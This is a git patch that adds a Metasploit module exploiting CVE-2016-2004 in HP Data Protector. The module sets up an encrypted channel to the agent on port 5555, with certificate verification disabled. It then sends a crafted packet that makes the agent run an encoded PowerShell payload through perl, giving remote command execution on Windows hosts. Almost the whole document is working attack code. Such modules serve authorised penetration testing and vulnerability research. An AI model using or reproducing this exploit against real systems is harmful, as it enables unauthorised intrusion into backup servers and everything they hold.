From 54c477162624bc35a3f7104774d95bad6dd3f86c Mon Sep 17 00:00:00 2001
From: Ian Lovering <ian@bathouse.co.uk>
Date: Tue, 31 May 2016 22:44:14 +0100
Subject: [PATCH] Exploit for HP Data Protector Encrypted Comms

Added exploit for HP Data Protector when using encrypted communications.

This has been tested against v9.00 on Windows Server 2008 R2 but should also work against older versions of DP.
---
 .../misc/hp_data_protector_encrypted_comms.rb | 136 ++++++++++++++++++
 1 file changed, 136 insertions(+)
 create mode 100644 modules/exploits/windows/misc/hp_data_protector_encrypted_comms.rb

diff --git a/modules/exploits/windows/misc/hp_data_protector_encrypted_comms.rb b/modules/exploits/windows/misc/hp_data_protector_encrypted_comms.rb
new file mode 100644
index 0000000000..7728b3d70c
--- /dev/null
+++ b/modules/exploits/windows/misc/hp_data_protector_encrypted_comms.rb
@@ -0,0 +1,136 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/exploit/powershell'
+
+require 'openssl'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Powershell
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "HP Data Protector Encrypted Communication Remote Command Execution",
+      'Description'    => %q{
+        This module exploits a well known remote code exection exploit after establishing encrypted control communications with a Data Protector agent. This allows exploitation of Data Protector agents that have been configured to only use encrypted control communications. This exploit works by executing the payload with Microsoft PowerShell so will only work against Windows Vista or newer. Tested against Data Protector 9.0 installed on Windows Server 2008 R2."
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [ 'Ian Lovering' ],
+      'References'     =>
+        [
+          [ 'CVE', '2016-2004' ],
+        ],
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X86_64 ] } ]
+        ],
+      'Payload'        =>
+        {
+          'BadChars' => "\x00"
+        },
+      'DefaultOptions'  =>
+        {
+          'WfsDelay' => 30,
+          'RPORT' => 5555
+        },
+      'Privileged'     => false,
+      'DisclosureDate' => "Apr 18 2016",
+      'DefaultTarget'  => 0))
+  end
+
+  def check
+    # For the check command
+    connect
+    sock.put(rand_text_alpha_upper(64))
+    response = sock.get_once(-1)
+    disconnect
+
+    if response.nil?
+      return Exploit::CheckCode::Safe
+    end
+
+    service_version = Rex::Text.to_ascii(response).chop.chomp
+
+    if service_version =~ /HP Data Protector/
+      print_status(service_version)
+      return Exploit::CheckCode::Detected
+    end
+
+    Exploit::CheckCode::Safe
+
+  end
+
+  def generate_dp_payload
+
+    command = cmd_psh_payload(
+      payload.encoded,
+      payload_instance.arch.first,
+      { remove_comspec: true, encode_final_payload: true })
+
+    payload =
+      "\x32\x00\x01\x01\x01\x01\x01\x01" +
+      "\x00\x01\x00\x01\x00\x01\x00\x01" +
+      "\x01\x00\x20\x32\x38\x00\x5c\x70" +
+      "\x65\x72\x6c\x2e\x65\x78\x65\x00" +
+      "\x20\x2d\x65\x73\x79\x73\x74\x65" +
+      "\x6d('#{command}')\x00"
+
+    payload_length = [payload.length].pack('N')
+
+    return payload_length + payload
+  end
+
+  def exploit
+    # Main function
+    encryption_init_data =
+      "\x00\x00\x00\x48\xff\xfe\x32\x00\x36\x00\x37\x00\x00\x00\x20\x00" +
+      "\x31\x00\x30\x00\x00\x00\x20\x00\x31\x00\x30\x00\x30\x00\x00\x00" +
+      "\x20\x00\x39\x00\x30\x00\x30\x00\x00\x00\x20\x00\x38\x00\x38\x00" +
+      "\x00\x00\x20\x00\x6f\x00\x6d\x00\x6e\x00\x69\x00\x64\x00\x6c\x00" +
+      "\x63\x00\x00\x00\x20\x00\x34\x00\x00\x00\x00\x00"
+
+    print_status("Initiating connection")
+
+    # Open connection
+    connect
+
+    # Send init data
+    sock.put(encryption_init_data)
+    begin
+      buf = sock.get_once
+    rescue ::EOFError
+    end
+
+    print_status("Establishing encrypted channel")
+
+    # Create TLS / SSL context
+    sock.extend(Rex::Socket::SslTcp)
+    sock.sslctx  = OpenSSL::SSL::SSLContext.new(:SSLv23)
+    sock.sslctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
+
+    sock.sslctx.options = OpenSSL::SSL::OP_ALL
+
+    # Enable TLS / SSL
+    sock.sslsock = OpenSSL::SSL::SSLSocket.new(sock, sock.sslctx)
+    sock.sslsock.connect
+
+    print_status("Sending payload")
+
+    # Send payload
+    sock.put(generate_dp_payload(), {timeout: 5})
+
+    # Close socket
+    disconnect
+
+    print_status("Waiting for payload execution (this can take up to 30 seconds or so)")
+  end
+
+end
+